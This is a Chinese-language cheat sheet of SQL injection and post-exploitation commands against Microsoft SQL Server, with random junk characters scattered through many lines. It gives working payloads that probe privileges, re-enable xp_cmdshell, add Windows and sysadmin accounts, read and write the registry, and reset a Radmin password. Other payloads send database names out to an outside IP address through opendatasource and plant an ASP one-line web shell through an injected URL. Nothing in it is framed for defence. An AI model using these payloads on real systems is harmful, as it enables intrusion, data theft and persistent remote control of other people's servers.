阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
/ I4 ?; m5 U( w4 M; D6 ~0 o8 J' B* v
//检测是否有读取某数据库的权限
9 \8 K" q5 d0 I0 xand 1= (Select HAS_DBACCESS('master'))
) @( x8 \- |4 j" i  n/ E/ g) qAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ x5 y3 I/ O1 {
# f% K3 I  D) I1 x4 P) ?8 X4 j3 n+ ~
1 Q" q4 N; H0 ~3 ]' @. v数字类型
and char(124)%2Buser%2Bchar(124)=0
3 I- L. Y& m7 e
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
8 @/ C9 I9 T& E6 |$ F' T3 k' and char(124)%2Buser%2Bchar(124)=0 and '%'='
! l% p% G8 D7 Y" B# k  u  g
爆用户名
, i! H/ J, z( Q8 e: p9 `and user>0
6 c: E- c) h% t* e( s' and user>0 and ''='
6 b! z5 f" B4 I
- Q/ k* B2 w0 |9 C检测是否为SA权限
/ E3 l  n; J0 X7 {and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
1 |- }+ o# i% a6 S2 v% f" m
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

8 a: Y" [! W7 N  h2 o检测是否支持多行
- s1 D/ x2 J* u1 s;declare @d int;--
8 J/ I" S5 o9 y5 M
" i" p6 \6 d% t$ l恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

3 H; F; d2 S! A0 r9 @% w7 z
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
, [* [9 Y  l- t  ^+ O
; D/ a" Y9 y, V5 {( N" h6 C9 j8 ^//-----------------------
//      执行命令
; ]1 v0 a2 D7 h8 {; k0 u3 c! P/ w//-----------------------
首先开启沙盘模式：
2 u) {: A2 G1 m& z4 uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
; h6 p. ~4 D, C" p/ ~select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. R. q, o/ y4 u3 ~- }
执行命令
' m0 X4 O$ m& F) R: E8 f3 k;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, P0 K+ u. ~3 U
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
4 x8 M0 d( L, e, u9 ^
* W# k9 A5 W. |+ Y: N- n判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
7 K6 R; _  B- `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

! v9 F4 M+ J$ t& rREG_SZ

6 G8 g, `) l3 h读注册表
4 W6 |. l, f) [8 E$ i" \& fexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

2 v) k; q: d$ s. w读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

- N4 c, z: T+ x; s
4 e, f3 z+ Z- l/ b8 }数据库备份
: {3 F7 m7 L' |backup database pubs to disk = 'c:\123.bak'

: z9 W* d+ b0 Y5 ]& R6 e//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--


1 F7 h3 {: G! v! c9 z' V
+ d9 \7 F1 ]) K* n( H* |& _! d2 s更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

0 O7 l5 G9 _4 e, P添加和删除一个SA权限的用户test：
1 f6 H& X+ w& q! a6 B* O+ pexec master.dbo.sp_addlogin test,ptlove
0 S. O. Y% r  ]4 oexec master.dbo.sp_addsrvrolemember test,sysadmin
/ X0 m( _; q3 J. V" t- H
( s0 ?- H2 B) u2 O删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
  p! J' `' S( {, P7 l
6 I) x+ Y7 L& s" E; v添加扩展存储过过程
8 F; s) O, K' _$ b, CEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 i  Z  Q+ O2 P  v' MGRANT exec On xp_proxiedadata TO public
2 `" l' P# N' e0 r+ h4 G

7 K; v( i. y5 q5 C停掉或激活某个服务。

/ p8 ~) s, m0 p0 hexec master..xp_servicecontrol 'stop','schedule'
1 @9 Y& K9 K" |' r; O1 D8 k( e: fexec master..xp_servicecontrol 'start','schedule'

) W: k( _( N3 v$ L6 \dbo.xp_subdirs
# y7 Z: w3 j. E) z8 n
0 C' y0 [3 ]; ?6 w& V1 I只列某个目录下的子目录。
. X9 X; @3 o: L) Fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

( D9 ~9 ], b* g3 _dbo.xp_makecab
* `# s& i. i. e
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

$ _7 [5 |: B' H/ A停掉某个执行中的程序，但赋予的参数是 Process ID。
; U+ I$ Z5 m( Z3 K1 L1 X利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。
* b! H8 \' Z1 Z( W) d  m" R
7 L, m- p# n/ p$ X9 Hxp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
* U; @1 K' P1 f. y8 ]# ]) V; ^Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

5 x' m7 W) L7 {+ P( _% x9 p0 G, e//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
+ e$ K$ @( r3 [' F  _; n

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
* {3 _/ Q8 ~+ b5 H0 x
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
/ S3 \1 J: R8 [
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

: A$ X3 _, ~0 g//删除内容
delete from table_name where Stockid = 3